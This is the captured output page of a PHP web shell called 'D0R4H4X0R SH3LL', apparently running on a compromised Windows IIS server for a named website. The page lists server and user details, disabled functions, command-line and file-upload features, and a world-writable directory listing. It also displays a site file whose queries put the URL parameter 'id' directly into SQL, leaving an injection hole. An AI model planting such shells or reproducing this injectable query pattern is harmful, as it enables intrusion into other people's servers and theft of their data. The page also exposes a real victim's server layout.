D0R4H4X0R SH3LL

Server Information

Server: Microsoft-IIS/10.0
System: Windows NT BH-PLESK-WEB3 10.0 build 20348 (Windows Server 2022) AMD64
User: IWPD_8556(lensai) ( 0 )
PHP Version: 8.3.21
Python Version: Python is not available
Disabled Functions:, Cron, Curl, Ftp, GCC, Mail, Mysql, PKEXEC, Perl, Python, SendMail, Ssh, Wget, exec, passthru, shell_exec, system

Features

Command Line

Find Longest Directory Path

Scan New PHP Files

Upload File

Directory: D:/INETPUB/VHOSTS/lensai.com/httpdocs/new/

Current File : D:/INETPUB/VHOSTS/lensai.com/httpdocs/new/project - Copy.php

<?php include_once 'header.php'; ?>
	<div class="main">	
	 <div class="project-wrapper">
	   <div class="project">
			<?php
				$id=$_GET['id'];
				$select=mysqli_query($con, "select * From product where id='$id' ");
				$row=mysqli_fetch_array($select);
				$title=$row['title'];
			
			?>
			
		 <div class="project-bottom">
			 <div align="right" class="right">
				<a href="producticon">PRODUCT</a> / <a href="product?category=<?php echo $row['category']; ?>"><?php echo $row['category']; ?></a> / <?php echo $title; ?>
			</div>
	         <div class="proj-desc">
		 	  	<h4>Features</h4> <div class="clear"></div>
				<p>
					<?php echo $row['description']; ?>
                </p>
		     </div>
		     <div class="related-desc">
		     	 <h4>Specification</h4><div class="clear"></div>
		     </div>
				<div>
		     		<ul>
						<li id="photos">
						<?php
						$select="select* from product_attach where category='$title'";
						$exe=mysqli_query($con,$select);
						while($row=mysqli_fetch_array($exe))
						{
						?>
							
							
								<img src="images/products_by_speciality/<?php echo $row['img']; ?>" alt="<?php echo $row['category']; ?>"/>
							

						<?php } ?>
						</li>
					</ul>
				</div>
		 </div>
			
	 </div>
	 
	 <div class="clear"></div>
  </div>
 </div>

  <?php include_once 'footer.php'; ?>
admin DIR
Directory drwxrwxrwx
B DIR
Directory drwxrwxrwx
Directory drwxrwxrwx
Directory drwxrwxrwx
css DIR
Directory drwxrwxrwx
fonts DIR
Directory drwxrwxrwx
images DIR
Directory drwxrwxrwx
js DIR
Directory drwxrwxrwx
s DIR
Directory drwxrwxrwx
.htaccess 0.118 KB
File -rw-rw-rw-
active.js 0.514 KB
File -rw-rw-rw-
admin.php 0.043 KB
File -rw-rw-rw-
blog.php 3.993 KB
File -rw-rw-rw-
blogs.php 3.755 KB
File -rw-rw-rw-
brochures.php 1.764 KB
File -rw-rw-rw-
brochures1.php 7.628 KB
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
contact.php 3.646 KB
File -rw-rw-rw-
controller.php 2.763 KB
File -rw-rw-rw-
counter.txt 0.003 KB
File -rw-rw-rw-
demo.php 19.660 KB
File -rw-rw-rw-
error_log 266.786 KB
File -rw-rw-rw-
footer.php 4.770 KB
File -rw-rw-rw-
header.php 5.879 KB
File -rw-rw-rw-
header1.php 5.216 KB
File -rw-rw-rw-
img.php 6.316 KB
File -rw-rw-rw-
index.php 4.650 KB
File -rw-rw-rw-
login.php 0.582 KB
File -rw-rw-rw-
mail.php 1.813 KB
File -rw-rw-rw-
paper.php 2.691 KB
File -rw-rw-rw-
product.php 10.401 KB
File -rw-rw-rw-
product1.php 13.077 KB
File -rw-rw-rw-
product_s.php 13.210 KB
File -rw-rw-rw-
producticon.php 5.646 KB
File -rw-rw-rw-
File -rw-rw-rw-
project.php 2.915 KB
File -rw-rw-rw-
project1.php 1.020 KB
File -rw-rw-rw-
temp.php 2.407 KB
File -rw-rw-rw-
test.html 0.006 KB
File -rw-rw-rw-
video.php 3.145 KB
File -rw-rw-rw-
web.config 1.730 KB
File -rw-rw-rw-
D0R4H4X0R SH3LL